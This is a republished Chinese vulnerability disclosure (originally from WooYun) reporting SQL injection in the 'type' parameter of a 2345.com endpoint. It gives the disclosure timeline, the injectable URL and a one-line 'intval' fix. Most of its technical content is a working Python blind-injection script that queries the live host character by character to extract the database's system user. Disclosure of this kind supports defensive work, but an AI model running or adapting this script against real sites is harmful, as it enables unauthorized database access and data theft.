神刀安全网

漏洞标题: 2345网址导航某分处存在SQL注入(附验证脚本)

漏洞详情

披露状态:

2016-04-13: 细节已通知厂商并且等待厂商处理中
2016-04-14: 厂商已经确认,细节仅向厂商公开
2016-04-24: 细节向核心白帽子及相关领域专家公开
2016-05-04: 细节向普通白帽子公开
2016-05-14: 细节向实习白帽子公开
2016-05-29: 细节向公众公开

简要描述:

。。。

详细说明:

注入点 http://so.2345.com/2345app/get_app_news.php?nt=0&type=660&id=

注入参数 type

有过滤

True

漏洞标题:  2345网址导航某分处存在SQL注入(附验证脚本)

False

漏洞标题:  2345网址导航某分处存在SQL注入(附验证脚本)

漏洞证明:

user [email protected]

漏洞标题:  2345网址导航某分处存在SQL注入(附验证脚本)

code 区域
#!/usr/bin/env python
#-*- coding: utf-8 -*-


import time
import string
import binascii
import requests


res = ''
character = "%." + string.digits + "@" + string.ascii_uppercase + "_" + string.ascii_lowercase

headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.69 Safari/537.36',
'Referer': 'www.baidu.com',
}


for i in range(1, 21):
for p in character:
while True:
try:
url = "http://so.2345.com/2345app/get_app_news.php?nt=0&type=660 and position({} in system_user())={}&id=".format('0x' + binascii.b2a_hex(p), i)
req = requests.get(url, headers=headers)
print req.url + ' --- ',
print len(req.text)
break
except:
pass
if len(req.text) > 100:
res += p
print "/n[Result]: " + res + "/n"
break
time.sleep(0.5)

print "/n/n[Finish]: " + res

修复方案:

直接intval吧!

版权声明:转载请注明来源 null_z@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 2345网址导航某分处存在SQL注入(附验证脚本)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址